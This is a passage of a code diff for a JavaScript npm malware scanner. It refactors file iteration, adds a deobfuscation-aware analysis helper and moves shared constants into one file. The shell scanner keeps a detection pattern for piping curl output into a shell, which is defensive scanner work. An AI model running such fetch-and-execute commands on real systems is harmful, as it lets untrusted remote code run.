+      try { await response.text(); } catch (e) { debugLog('response drain failed:', e.message); }
       return null;
     }
 

package/src/scanner/obfuscation.js

@@ -1,30 +1,15 @@
 const fs = require('fs');
 const path = require('path');
-const { findFiles } = require('../utils.js');
+const { findFiles, forEachSafeFile } = require('../utils.js');
 
 // node_modules NOT excluded: detect obfuscated code in dependencies
 const OBF_EXCLUDED_DIRS = ['.git', '.muaddib-cache'];
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
 
 function detectObfuscation(targetPath) {
   const threats = [];
-  const files = findFiles(targetPath, { extensions: ['.js'], excludedDirs: OBF_EXCLUDED_DIRS });
-
-  for (const file of files) {
-    // Skip files exceeding MAX_FILE_SIZE to avoid memory issues
-    try {
-      const stat = fs.statSync(file);
-      if (stat.size > MAX_FILE_SIZE) continue;
-    } catch {
-      continue;
-    }
+  const files = findFiles(targetPath, { extensions: ['.js', '.mjs', '.cjs'], excludedDirs: OBF_EXCLUDED_DIRS });
 
-    let content;
-    try {
-      content = fs.readFileSync(file, 'utf8');
-    } catch {
-      continue; // Skip unreadable files
-    }
+  forEachSafeFile(files, (file, content) => {
     const relativePath = path.relative(targetPath, file);
 
     const signals = [];
@@ -96,7 +81,7 @@ function detectObfuscation(targetPath) {
         file: relativePath
       });
     }
-  }
+  });
 
   return threats;
 }

package/src/scanner/shell.js

@@ -1,9 +1,8 @@
 const fs = require('fs');
 const path = require('path');
-const { findFiles } = require('../utils.js');
+const { findFiles, forEachSafeFile } = require('../utils.js');
 
 const SHELL_EXCLUDED_DIRS = ['node_modules', '.git', '.muaddib-cache'];
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
 
 const MALICIOUS_PATTERNS = [
   { pattern: /curl.*\|.*sh/m, name: 'curl_pipe_shell', severity: 'HIGH' },
@@ -26,16 +25,7 @@ async function scanShellScripts(targetPath) {
   // Cherche les fichiers shell
   const files = findFiles(targetPath, { extensions: ['.sh', '.bash', '.zsh', '.command'], excludedDirs: SHELL_EXCLUDED_DIRS });
 
-  for (const file of files) {
-    let content;
-    try {
-      const stat = fs.statSync(file);
-      if (stat.size > MAX_FILE_SIZE) continue;
-      content = fs.readFileSync(file, 'utf8');
-    } catch {
-      continue; // Skip unreadable files
-    }
-    
+  forEachSafeFile(files, (file, content) => {
     // Strip comment lines to avoid false positives on documentation
     const activeContent = content.split('\n')
       .filter(line => !line.trimStart().startsWith('#'))
@@ -51,7 +41,7 @@ async function scanShellScripts(targetPath) {
         });
       }
     }
-  }
+  });
 
   return threats;
 }

package/src/shared/analyze-helper.js

@@ -0,0 +1,49 @@
+const path = require('path');
+const { isDevFile, findJsFiles, forEachSafeFile } = require('../utils.js');
+
+/**
+ * Shared scanner wrapper: iterates JS files, runs analyzeFileFn on original + deobfuscated code,
+ * deduplicates findings by type::message key.
+ * @param {string} targetPath - Root directory to scan
+ * @param {Function} analyzeFileFn - (content, filePath, basePath) => threats[]
+ * @param {object} [options]
+ * @param {Function} [options.deobfuscate] - Deobfuscation function
+ * @param {string[]} [options.excludedFiles] - Relative paths to skip
+ * @param {boolean} [options.skipDevFiles=true] - Whether to skip dev/test files
+ * @returns {Array} Combined threats
+ */
+function analyzeWithDeobfuscation(targetPath, analyzeFileFn, options = {}) {
+  const threats = [];
+  const files = findJsFiles(targetPath);
+
+  forEachSafeFile(files, (file, content) => {
+    const relativePath = path.relative(targetPath, file).replace(/\\/g, '/');
+
+    if (options.excludedFiles && options.excludedFiles.includes(relativePath)) return;
+    if (options.skipDevFiles !== false && isDevFile(relativePath)) return;
+
+    // Analyze original code first (preserves obfuscation-detection rules)
+    const fileThreats = analyzeFileFn(content, file, targetPath);
+    threats.push(...fileThreats);
+
+    // Also analyze deobfuscated code for additional findings hidden by obfuscation
+    if (typeof options.deobfuscate === 'function') {
+      try {
+        const result = options.deobfuscate(content);
+        if (result.transforms.length > 0) {
+          const deobThreats = analyzeFileFn(result.code, file, targetPath);
+          const existingKeys = new Set(fileThreats.map(t => `${t.type}::${t.message}`));
+          for (const dt of deobThreats) {
+            if (!existingKeys.has(`${dt.type}::${dt.message}`)) {
+              threats.push(dt);
+            }
+          }
+        }
+      } catch { /* deobfuscation failed — skip */ }
+    }
+  });
+
+  return threats;
+}
+
+module.exports = { analyzeWithDeobfuscation };

package/src/shared/constants.js

@@ -86,4 +86,8 @@ const NPM_PACKAGE_REGEX = /^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*
 const MAX_TARBALL_SIZE = 50 * 1024 * 1024; // 50MB
 const DOWNLOAD_TIMEOUT = 30_000; // 30 seconds
 
-module.exports = { REHABILITATED_PACKAGES, NPM_PACKAGE_REGEX, MAX_TARBALL_SIZE, DOWNLOAD_TIMEOUT };
+// Shared scanner constants
+const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB — skip files larger than this to avoid memory issues
+const ACORN_OPTIONS = { ecmaVersion: 2024, sourceType: 'module', allowHashBang: true };
+
+module.exports = { REHABILITATED_PACKAGES, NPM_PACKAGE_REGEX, MAX_TARBALL_SIZE, DOWNLOAD_TIMEOUT, MAX_FILE_SIZE, ACORN_OPTIONS };

package/src/temporal-ast-diff.js

@@ -4,12 +4,13 @@ const path = require('path');
 const os = require('os');
 const acorn = require('acorn');
 const walk = require('acorn-walk');
-const { findJsFiles } = require('./utils.js');
+const { findJsFiles, forEachSafeFile, debugLog } = require('./utils.js');
 const { fetchPackageMetadata, getLatestVersions } = require('./temporal-analysis.js');
 const { downloadToFile, extractTarGz, sanitizePackageName } = require('./shared/download.js');
 
+const { MAX_FILE_SIZE, ACORN_OPTIONS } = require('./shared/constants.js');
+
 const REGISTRY_URL = 'https://registry.npmjs.org';
-const MAX_FILE_SIZE = 10 * 1024 * 1024; // 10MB
 const METADATA_TIMEOUT = 10_000;
 
 const SENSITIVE_PATHS = [
@@ -101,12 +102,12 @@ async function fetchPackageTarball(packageName, version) {
     await downloadToFile(tarballUrl, tgzPath);
     extractedDir = extractTarGz(tgzPath, tmpDir);
   } catch (err) {
-    try { fs.rmSync(tmpDir, { recursive: true, force: true }); } catch {}
+    try { fs.rmSync(tmpDir, { recursive: true, force: true }); } catch (e) { debugLog('tmpDir cleanup failed:', e.message); }
     throw err;
   }
 
   const cleanup = () => {
-    try { fs.rmSync(tmpDir, { recursive: true, force: true }); } catch {}
+    try { fs.rmSync(tmpDir, { recursive: true, force: true }); } catch (e) { debugLog('tmpDir cleanup failed:', e.message); }
   };
 
   return { dir: extractedDir, cleanup };
@@ -120,20 +121,9 @@ async function fetchPackageTarball(packageName, version) {
 function extractDangerousPatterns(directory) {
   const patterns = new Set();
   const files = findJsFiles(directory);
-
-  for (const file of files) {
-    try {
-      const stat = fs.statSync(file);
-      if (stat.size > MAX_FILE_SIZE) continue;
-    } catch { continue; }
-
-    let content;
-    try { content = fs.readFileSync(file, 'utf8'); }
-    catch { continue; }
-
+  forEachSafeFile(files, (file, content) => {
     extractPatternsFromSource(content, patterns);
-  }
-
+  });
   return patterns;
 }
 
@@ -145,7 +135,7 @@ function extractDangerousPatterns(directory) {
 function extractPatternsFromSource(source, patterns) {
   let ast;
   try {
-    ast = acorn.parse(source, { ecmaVersion: 2024, sourceType: 'module', allowHashBang: true });
+    ast = acorn.parse(source, ACORN_OPTIONS);
   } catch { return; }
 
   walk.simple(ast, {

package/src/utils.js

@@ -1,5 +1,6 @@
 const fs = require('fs');
 const path = require('path');
+const { MAX_FILE_SIZE } = require('./shared/constants.js');
 
 /**
  * Directories excluded from scanning.
@@ -145,7 +146,7 @@ function findFiles(dir, options = {}) {
  * @returns {string[]} List of .js file paths
  */
 function findJsFiles(dir, results = []) {
-  return findFiles(dir, { extensions: ['.js'], results });
+  return findFiles(dir, { extensions: ['.js', '.mjs', '.cjs'], results });
 }
 
 /**
@@ -228,6 +229,61 @@ class Spinner {
   }
 }
 
+/**
+ * Iterates files with size guard and error handling.
+ * Calls callback(file, content) for each readable file under MAX_FILE_SIZE.
+ */
+function forEachSafeFile(files, callback) {
+  for (const file of files) {
+    try {
+      const stat = fs.statSync(file);
+      if (stat.size > MAX_FILE_SIZE) continue;
+    } catch { continue; }
+    let content;
+    try {
+      content = fs.readFileSync(file, 'utf8');
+    } catch { continue; }
+    callback(file, content);
+  }
+}
+
+/**
+ * Lists installed packages in node_modules (handles scoped packages).
+ * @param {string} targetPath - Root of the project
+ * @returns {string[]} Package names (e.g. ['express', '@babel/core'])
+ */
+function listInstalledPackages(targetPath) {
+  const nm = path.join(targetPath, 'node_modules');
+  if (!fs.existsSync(nm)) return [];
+  const names = [];
+  try {
+    for (const item of fs.readdirSync(nm)) {
+      if (item.startsWith('.')) continue;
+      const itemPath = path.join(nm, item);
+      try {
+        const stat = fs.lstatSync(itemPath);
+        if (stat.isSymbolicLink() || !stat.isDirectory()) continue;
+        if (item.startsWith('@')) {
+          for (const si of fs.readdirSync(itemPath)) {
+            const ss = fs.lstatSync(path.join(itemPath, si));
+            if (!ss.isSymbolicLink() && ss.isDirectory()) names.push(`${item}/${si}`);
+          }
+        } else {
+          names.push(item);
+        }
+      } catch { /* skip unreadable */ }
+    }
+  } catch { /* no node_modules readable */ }
+  return names;
+}
+
+/**
+ * Logs to stderr when MUADDIB_DEBUG is set. No-op otherwise.
+ */
+function debugLog(...args) {
+  if (process.env.MUADDIB_DEBUG) console.error('[DEBUG]', ...args);
+}
+
 module.exports = {
   EXCLUDED_DIRS,
   DEV_PATTERNS,
@@ -238,5 +294,8 @@ module.exports = {
   getCallName,
   Spinner,
   setExtraExcludes,
-  getExtraExcludes
+  getExtraExcludes,
+  forEachSafeFile,
+  listInstalledPackages,
+  debugLog
 };